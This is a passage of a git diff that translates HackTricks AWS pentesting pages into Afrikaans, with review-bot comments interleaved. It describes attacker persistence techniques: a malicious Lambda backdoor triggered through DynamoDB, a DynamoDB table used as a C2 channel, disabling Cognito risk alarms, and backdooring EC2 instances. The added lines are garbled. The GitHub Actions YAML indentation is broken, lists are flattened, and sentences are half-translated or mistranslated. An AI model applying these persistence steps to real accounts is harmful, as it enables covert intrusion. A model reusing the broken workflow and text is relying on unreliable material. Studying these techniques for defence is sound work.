ID's](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) gebruik hierdie vooraf, maar is uniek slegs in kombinasie met die geheime toegangssleutel en die sessietoken. 
| -### Recommended permissions to audit accounts +### Aanbevole toestemmings om rekeninge te oudit -The following privileges grant various read access of metadata: +Die volgende voorregte bied verskeie lees toegang van metadata: - `arn:aws:iam::aws:policy/SecurityAudit` - `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess` @@ -336,14 +318,13 @@ The following privileges grant various read access of metadata: - `directconnect:DescribeConnections` - `dynamodb:ListTables` -## Misc +## Verskeie -### CLI Authentication - -In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\ -In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\ -Example of credentials file with more than 1 profile: +### CLI Verifikasie +Om 'n gereelde gebruiker te laat verifieer by AWS via CLI, moet jy **lokale akkrediteer** hĂȘ. Standaard kan jy dit **handmatig** in `~/.aws/credentials` konfigureer of deur **te loop** `aws configure`.\ +In daardie lĂȘer kan jy meer as een profiel hĂȘ, as **geen profiel** gespesifiseer word met die **aws cli**, sal die een genaamd **`[default]`** in daardie lĂȘer gebruik word.\ +Voorbeeld van akkrediteer lĂȘer met meer as 1 profiel: ``` [default] aws_access_key_id = AKIA5ZDCUJHF83HDTYUT 
@@ -354,12 +335,10 @@ aws_access_key_id = AKIA8YDCu7TGTR356SHYT aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7 region = eu-west-2 ``` - If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn --role-session-name sessname`) and configure the credentials. -You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\ +You can use the `~/.aws/config` file to[ **aandui watter rolle om aan te neem**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\ A config file example: - ``` [profile acc2] region=eu-west-2 
@@ -368,23 +347,16 @@ role_session_name = source_profile = sts_regional_endpoints = regional ``` - -With this config file you can then use aws cli like: - +Met hierdie konfigurasie-lĂȘer kan jy dan aws cli gebruik soos: ``` aws --profile acc2 ... ``` +As jy op soek is na iets **soortgelyks** soos dit, maar vir die **blaaier**, kan jy die **uitbreiding** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en) kyk. -If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en). - -## References +## Verwysings - [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html) - [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/) - [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md index 73ae6b448..0af0dde30 100644 --- a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md +++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md 
@@ -1,87 +1,84 @@ -# AWS - Federation Abuse +# AWS - Federasie Misbruik {{#include ../../../banners/hacktricks-training.md}} ## SAML -For info about SAML please check: +Vir inligting oor SAML, kyk asseblief: {{#ref}} https://book.hacktricks.xyz/pentesting-web/saml-attacks {{#endref}} -In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key) +Om 'n **Identiteitsfederasie deur SAML** te konfigureer, moet jy net 'n **naam** en die **metadata XML** wat al die SAML-konfigurasie bevat (**eindpunte**, **sertifikaat** met publieke sleutel) verskaf. -## OIDC - Github Actions Abuse +## OIDC - Github Aksies Misbruik -In order to add a github action as Identity provider: - -1. For _Provider type_, select **OpenID Connect**. -2. For _Provider URL_, enter `https://token.actions.githubusercontent.com` -3. Click on _Get thumbprint_ to get the thumbprint of the provider -4. For _Audience_, enter `sts.amazonaws.com` -5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like: - - ```json - { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "token.actions.githubusercontent.com:sub": [ - "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request", - "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main" - ], - "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" - } - } - } - ] - } - ``` -6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**. -7. 
The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**. -8. Finally use a github action to configure the AWS creds to be used by the workflow: +Om 'n github aksie as Identiteitsverskaffer by te voeg: +1. Vir _Verskaffer tipe_, kies **OpenID Connect**. +2. Vir _Verskaffer URL_, voer `https://token.actions.githubusercontent.com` in. +3. Klik op _Kry duimafdruk_ om die duimafdruk van die verskaffer te kry. +4. Vir _Teiken_, voer `sts.amazonaws.com` in. +5. Skep 'n **nuwe rol** met die **toestemmings** wat die github aksie benodig en 'n **vertrouensbeleid** wat die verskaffer vertrou soos: +- ```json +{ +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"token.actions.githubusercontent.com:sub": [ +"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request", +"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main" +], +"token.actions.githubusercontent.com:aud": "sts.amazonaws.com" +} +} +} +] +} +``` +6. Let op in die vorige beleid hoe slegs 'n **tak** van 'n **bewaarplek** van 'n **organisasie** gemagtig was met 'n spesifieke **trigger**. +7. Die **ARN** van die **rol** wat die github aksie gaan kan **naboots**, gaan die "geheime" wees wat die github aksie moet weet, so **stoor** dit binne 'n **geheim** binne 'n **omgewing**. +8. 
Laastens, gebruik 'n github aksie om die AWS kredensiale te konfigureer wat deur die werksvloei gebruik gaan word: ```yaml name: "test AWS Access" # The workflow should only trigger on pull requests to the main branch on: - pull_request: - branches: - - main +pull_request: +branches: +- main # Required to get the ID Token that will be used for OIDC permissions: - id-token: write - contents: read # needed for private repos to checkout +id-token: write +contents: read # needed for private repos to checkout jobs: - aws: - runs-on: ubuntu-latest - steps: - - name: Checkout - uses: actions/checkout@v3 +aws: +runs-on: ubuntu-latest +steps: +- name: Checkout +uses: actions/checkout@v3 - - name: Configure AWS Credentials - uses: aws-actions/configure-aws-credentials@v1 - with: - aws-region: eu-west-1 - role-to-assume:${{ secrets.READ_ROLE }} - role-session-name: OIDCSession +- name: Configure AWS Credentials +uses: aws-actions/configure-aws-credentials@v1 +with: +aws-region: eu-west-1 +role-to-assume:${{ secrets.READ_ROLE }} +role-session-name: OIDCSession - - run: aws sts get-caller-identity - shell: bash +- run: aws sts get-caller-identity +shell: bash ``` - -## OIDC - EKS Abuse - +## OIDC - EKS Misbruik ```bash # Crate an EKS cluster (~10min) eksctl create cluster --name demo --fargate 
@@ -91,43 +88,34 @@ eksctl create cluster --name demo --fargate # Create an Identity Provider for an EKS cluster eksctl utils associate-iam-oidc-provider --cluster Testing --approve ``` - -It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy: - +Dit is moontlik om **OIDC providers** in 'n **EKS** kluster te genereer deur eenvoudig die **OIDC URL** van die kluster as 'n **nuwe Open ID Identiteitsverskaffer** in te stel. Dit is 'n algemene standaardbeleid: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" +} +} +} +] } ``` +Hierdie beleid dui korrek aan dat **slegs** die **EKS-kluster** met **id** `20C159CDF6F2349B68846BEC03BE031B` die rol kan aanvaar. Dit dui egter nie aan watter diensrekening dit kan aanvaar nie, wat beteken dat **ENIGE diensrekening met 'n webidentiteitskenmerk** in staat gaan wees om die rol te aanvaar. -This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. 
However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role. - -In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as: - +Om te spesifiseer **watter diensrekening die rol moet kan aanvaar,** is dit nodig om 'n **voorwaarde** te spesifiseer waar die **diensrekeningnaam gespesifiseer word**, soos: ```bash "oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account", ``` - -## References +## Verwysings - [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md index 28868b9f1..b77f15149 100644 --- a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md +++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md 
@@ -1,21 +1,17 @@ -# AWS - Permissions for a Pentest +# AWS - Toestemmings vir 'n Pentest {{#include ../../banners/hacktricks-training.md}} -These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools: +Dit is die toestemmings wat jy nodig het op elke AWS-rekening wat jy wil oudit om al die voorgestelde AWS-ouditgereedskap te kan gebruik: -- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) -- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions: - - **access-analyzer:List\*** - - **access-analyzer:Get\*** - - **iam:CreateServiceLinkedRole** - - **access-analyzer:CreateAnalyzer** - - Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission) - - **access-analyzer:DeleteAnalyzer** - - Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission) +- Die standaard beleid **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) +- Om [aws_iam_review](https://github.com/carlospolop/aws_iam_review) te kan uitvoer, het jy ook die toestemmings nodig: +- **access-analyzer:List\*** +- **access-analyzer:Get\*** +- **iam:CreateServiceLinkedRole** +- **access-analyzer:CreateAnalyzer** +- Opsioneel as die kliĂ«nt die analiseerders vir jou genereer, maar gewoonlik is dit makliker om net vir hierdie toestemming te vra) +- **access-analyzer:DeleteAnalyzer** +- Opsioneel as die kliĂ«nt die analiseerders vir jou verwyder, maar gewoonlik is dit makliker om net vir hierdie toestemming te vra) {{#include ../../banners/hacktricks-training.md}} - - - - 
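Review bot: In the first hunk of src/pentesting-cloud/aws-security/aws-basic-information/README.md the Identity Federation paragraph is dropped rather than translated: the `-` lines beginning `However, you will usually want to give a **different role depending on the group of the user**` have no `+` counterpart, so the Afrikaans page loses the point that several IAM roles can trust one IdP and the third party decides which role each user may assume; add the translated paragraph before `### IAM Identiteitsentrum`. Three smaller issues in the same hunk: the STS error text is program output and should stay in English (the `+` lines give `"omdat geen sessiebeleid dit toelaat nie"` for `"... because no session policy allows the ..."`, which a reader can no longer match against the real message); `(trusting)` and `(trusted)` in the Cross Account section are both rendered `(wat vertrou)` although the next sentence correctly says `die gebruiker wat vertrou is`, so the second should be `(wat vertrou word)` or the reader cannot tell which account owns the role and which one assumes it; and the `S·` typo in `slegs S· emmers kan lees` is copied over where `S3` is meant. `Note dat` at the start of the session-policy caveat is also left half in English, while `Let op` is used later in the same patch.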
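Review bot: In the `@@ -336,14 +318,13 @@` hunk of that README, "credentials" is rendered with the verb `akkrediteer` (`lokale akkrediteer`, `akkrediteer lĂȘer`, and `Akkrediteer Verslag` in the first hunk), while the GitHub Actions hunk of aws-federation-abuse.md uses the noun `kredensiale`; pick one noun and use it across the patch. `deur **te loop** `aws configure`` also translates "running" literally (walking); `deur `aws configure` uit te voer` is what is meant.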
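Review bot: The `@@ -354,12 +335,10 @@` hunk of that README leaves the role-assumption paragraph half translated: `You can use the `~/.aws/config` file to[ **aandui watter rolle om aan te neem**](...), and then use the `--profile` param as usual` mixes both languages in one sentence, and the preceding `If you need to access **different AWS accounts** ...` line is untouched English. Translate the whole paragraph; the link text on its own is not a useful unit.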
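Review bot: In the first hunk of src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md the re-indentation breaks the GitHub Actions workflow: the `+` lines put `pull_request:`, `id-token: write` and `runs-on: ubuntu-latest` at column 0, so `pull_request` is no longer nested under `on:`, `id-token` no longer under `permissions:` and the steps no longer under the `aws` job; the file will not load as a workflow, and the `permissions: id-token: write` block that the OIDC token exchange depends on is exactly what is lost. YAML is indentation-sensitive (the JSON trust policy survives the same treatment only because JSON is not), so restore the original indentation. The same pass turns the fence inside list item 5 into `+- ```json` with a stray bullet and drops the list indentation, so the code block no longer belongs to item 5 and renders broken, and `role-to-assume:${{ secrets.READ_ROLE }}` still lacks the space after the colon that YAML needs to read it as a key/value pair (carried over from the `-` line).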
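Review bot: In src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md the hunk flattens the nested list: the permissions that belonged under `Om [aws_iam_review](...) te kan uitvoer, het jy ook die toestemmings nodig:` and the two `Opsioneel as die kliĂ«nt ...` explanations that belonged under `access-analyzer:CreateAnalyzer` and `access-analyzer:DeleteAnalyzer` are all added at the top level, so the page no longer says which permissions are for the tool and which note applies to which permission. Keep the two- and three-level indentation of the `-` lines; the unbalanced `)` at the end of both `Opsioneel` lines is carried over from the original and can be dropped at the same time.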
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md index f3b45c4d3..b5bbc400d 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/README.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/README.md @@ -1,6 +1 @@ -# AWS - Persistence - - - - - +# AWS - Volharding diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md index 6d2b0ec35..b40f42c18 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md 
@@ -1,36 +1,32 @@ -# AWS - API Gateway Persistence +# AWS - API Gateway Persistensie {{#include ../../../banners/hacktricks-training.md}} ## API Gateway -For more information go to: +Vir meer inligting, gaan na: {{#ref}} ../aws-services/aws-api-gateway-enum.md {{#endref}} -### Resource Policy +### Hulpbronbeleid -Modify the resource policy of the API gateway(s) to grant yourself access to them +Wysig die hulpbronbeleid van die API-gateway(s) om jouself toegang te gee tot hulle. -### Modify Lambda Authorizers +### Wysig Lambda Outeurs -Modify the code of lambda authorizers to grant yourself access to all the endpoints.\ -Or just remove the use of the authorizer. +Wysig die kode van lambda outeurs om jouself toegang te gee tot al die eindpunte.\ +Of verwyder net die gebruik van die outeur. -### IAM Permissions +### IAM Toestemmings -If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\ -Or just remove the use of the authorizer. +As 'n hulpbron IAM outeur gebruik, kan jy jouself toegang gee deur IAM toestemmings te wysig.\ +Of verwyder net die gebruik van die outeur. -### API Keys +### API Sleutels -If API keys are used, you could leak them to maintain persistence or even create new ones.\ -Or just remove the use of API keys. +As API sleutels gebruik word, kan jy hulle lek om volharding te handhaaf of selfs nuwe te skep.\ +Of verwyder net die gebruik van API sleutels. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md index e2e037e53..5d8dd38b5 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md 
@@ -1,27 +1,27 @@ -# AWS - Cognito Persistence +# AWS - Cognito Persistensie {{#include ../../../banners/hacktricks-training.md}} ## Cognito -For more information, access: +Vir meer inligting, toegang: {{#ref}} ../aws-services/aws-cognito-enum/ {{#endref}} -### User persistence +### Gebruiker persistensie -Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like: +Cognito is 'n diens wat dit moontlik maak om rolle aan nie-geverifieerde en geverifieerde gebruikers toe te ken en om 'n gids van gebruikers te beheer. Verskeie verskillende konfigurasies kan verander word om 'n mate van persistensie te handhaaf, soos: -- **Adding a User Pool** controlled by the user to an Identity Pool -- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow** - - Or to an **authenticated Identity Pool** if the attacker can login - - Or **improve the permissions** of the given roles -- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool** -- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool +- **Voeg 'n Gebruiker Pool** wat deur die gebruiker beheer word, by 'n Identiteits Pool +- Gee 'n **IAM rol aan 'n nie-geverifieerde Identiteits Pool en laat Basiese auth vloei toe** +- Of aan 'n **geverifieerde Identiteits Pool** as die aanvaller kan aanmeld +- Of **verbeter die toestemmings** van die gegewe rolle +- **Skep, verifieer & privesc** via attributes wat deur gebruikers of nuwe gebruikers in 'n **Gebruiker Pool** beheer word +- **Laat eksterne Identiteits Verskaffers** toe om in 'n Gebruiker Pool of in 'n Identiteits Pool aan te meld -Check how to do these actions in +Kyk hoe om hierdie aksies uit te voer in {{#ref}} ../aws-privilege-escalation/aws-cognito-privesc.md 
@@ -29,18 +29,12 @@ Check how to do these actions in ### `cognito-idp:SetRiskConfiguration` -An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options: - +'n Aanvaller met hierdie voorregte kan die risiko konfigurasie verander om as 'n Cognito gebruiker aan te meld **sonder dat alarms geaktiveer word**. [**Kyk na die cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) om al die opsies te kyk: ```bash aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION} ``` - -By default this is disabled: +Standaard is dit gedeaktiveer:
{{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md index 75a824e73..7d465c3df 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md 
@@ -1,67 +1,59 @@ -# AWS - DynamoDB Persistence +# AWS - DynamoDB Volharding {{#include ../../../banners/hacktricks-training.md}} ### DynamoDB -For more information access: +Vir meer inligting, toegang: {{#ref}} ../aws-services/aws-dynamodb-enum.md {{#endref}} -### DynamoDB Triggers with Lambda Backdoor - -Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account. +### DynamoDB Triggers met Lambda Agterdeur +Deur gebruik te maak van DynamoDB triggers, kan 'n aanvaller 'n **stealthy agterdeur** skep deur 'n kwaadwillige Lambda-funksie met 'n tabel te assosieer. Die Lambda-funksie kan geaktiveer word wanneer 'n item bygevoeg, gewysig of verwyder word, wat die aanvaller in staat stel om arbitrĂȘre kode binne die AWS-rekening uit te voer. ```bash # Create a malicious Lambda function aws lambda create-function \ - --function-name MaliciousFunction \ - --runtime nodejs14.x \ - --role \ - --handler index.handler \ - --zip-file fileb://malicious_function.zip \ - --region +--function-name MaliciousFunction \ +--runtime nodejs14.x \ +--role \ +--handler index.handler \ +--zip-file fileb://malicious_function.zip \ +--region # Associate the Lambda function with the DynamoDB table as a trigger aws dynamodbstreams describe-stream \ - --table-name TargetTable \ - --region +--table-name TargetTable \ +--region # Note the "StreamArn" from the output aws lambda create-event-source-mapping \ - --function-name MaliciousFunction \ - --event-source \ - --region +--function-name MaliciousFunction \ +--event-source \ +--region ``` +Om volharding te handhaaf, kan die aanvaller items in die DynamoDB-tabel skep of wysig, wat die kwaadwillige Lambda-funksie sal aktiveer. 
Dit stel die aanvaller in staat om kode binne die AWS-rekening uit te voer sonder direkte interaksie met die Lambda-funksie. -To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function. - -### DynamoDB as a C2 Channel - -An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands. +### DynamoDB as 'n C2-kanaal +'n Aanvaller kan 'n DynamoDB-tabel gebruik as 'n **opdrag en beheer (C2) kanaal** deur items te skep wat opdragte bevat en gecompromitteerde instansies of Lambda-funksies te gebruik om hierdie opdragte op te haal en uit te voer. ```bash # Create a DynamoDB table for C2 aws dynamodb create-table \ - --table-name C2Table \ - --attribute-definitions AttributeName=CommandId,AttributeType=S \ - --key-schema AttributeName=CommandId,KeyType=HASH \ - --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ - --region +--table-name C2Table \ +--attribute-definitions AttributeName=CommandId,AttributeType=S \ +--key-schema AttributeName=CommandId,KeyType=HASH \ +--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ +--region # Insert a command into the table aws dynamodb put-item \ - --table-name C2Table \ - --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ - --region +--table-name C2Table \ +--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ +--region ``` - -The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources. 
+Die gecompromitteerde instansies of Lambda-funksies kan periodiek die C2-tabel vir nuwe opdragte nagaan, dit uitvoer, en opsioneel die resultate terug na die tabel rapporteer. Dit stel die aanvaller in staat om volharding en beheer oor die gecompromitteerde hulpbronne te handhaaf. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md index b52ac9e85..0e7acb9ae 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md 
@@ -1,58 +1,54 @@ -# AWS - EC2 Persistence +# AWS - EC2 Persistensie {{#include ../../../banners/hacktricks-training.md}} ## EC2 -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} -### Security Group Connection Tracking Persistence +### Sekuriteitsgroep Verbinding Volg Persistensie -If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic. +As 'n verdediger vind dat 'n **EC2-instantie gecompromitteer is**, sal hy waarskynlik probeer om die **netwerk** van die masjien te **isoleer**. Hy kan dit doen met 'n eksplisiete **Deny NACL** (maar NACLs beĂŻnvloed die hele subnet), of deur die **sekuriteitsgroep** te verander om **enige soort van inkomende of uitgaande** verkeer te verbied. 
-If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.** +As die aanvaller 'n **omgekeerde shell afkomstig van die masjien** gehad het, selfs al is die SG gewysig om nie inkomende of uitgaande verkeer toe te laat nie, sal die **verbinding nie beĂ«indig word nie** [**Sekuriteitsgroep Verbinding Volg**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.** -### EC2 Lifecycle Manager +### EC2 Levensiklusbestuurder -This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\ -An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**. +Hierdie diens laat toe om die **skepping van AMIs en snapshots** te **skeduleer** en selfs om dit met ander rekeninge te **deel**.\ +'n Aanvaller kan die **generering van AMIs of snapshots** van al die beelde of al die volumes **elke week** skeduleer en dit **met sy rekening deel**. -### Scheduled Instances +### Geskeduleerde Instanties -It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access. +Dit is moontlik om instanties te skeduleer om daagliks, weekliks of selfs maandeliks te loop. 'n Aanvaller kan 'n masjien met hoĂ« voorregte of interessante toegang laat loop waar hy toegang kan verkry. -### Spot Fleet Request +### Spot Vloot Versoek -Spot instances are **cheaper** than regular instances. 
An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**. +Spot-instanties is **goedkoper** as gewone instanties. 'n Aanvaller kan 'n **klein spot vlootversoek vir 5 jaar** (byvoorbeeld) begin, met **outomatiese IP** toewysing en 'n **gebruikersdata** wat na die aanvaller **stuur wanneer die spot-instantie begin** en die **IP-adres** en met 'n **hoĂ« voorregte IAM-rol**. -### Backdoor Instances +### Agterdeur Instanties -An attacker could get access to the instances and backdoor them: +'n Aanvaller kan toegang tot die instanties verkry en dit agterdeur: -- Using a traditional **rootkit** for example -- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md)) -- Backdooring the **User Data** +- Gebruik 'n tradisionele **rootkit** byvoorbeeld +- Voeg 'n nuwe **publieke SSH-sleutel** by (kyk [EC2 privesc opsies](../aws-privilege-escalation/aws-ec2-privesc.md)) +- Agterdeur die **Gebruikersdata** -### **Backdoor Launch Configuration** +### **Agterdeur Ontplooiing Konfigurasie** -- Backdoor the used AMI -- Backdoor the User Data -- Backdoor the Key Pair +- Agterdeur die gebruikte AMI +- Agterdeur die Gebruikersdata +- Agterdeur die Sleutel Paar ### VPN -Create a VPN so the attacker will be able to connect directly through i to the VPC. +Skep 'n VPN sodat die aanvaller direk deur dit na die VPC kan verbind. ### VPC Peering -Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC. +Skep 'n peeringverbinding tussen die slagoffer VPC en die aanvaller VPC sodat hy toegang tot die slagoffer VPC kan verkry. {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md index 07928fbd4..02081dc0b 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md 
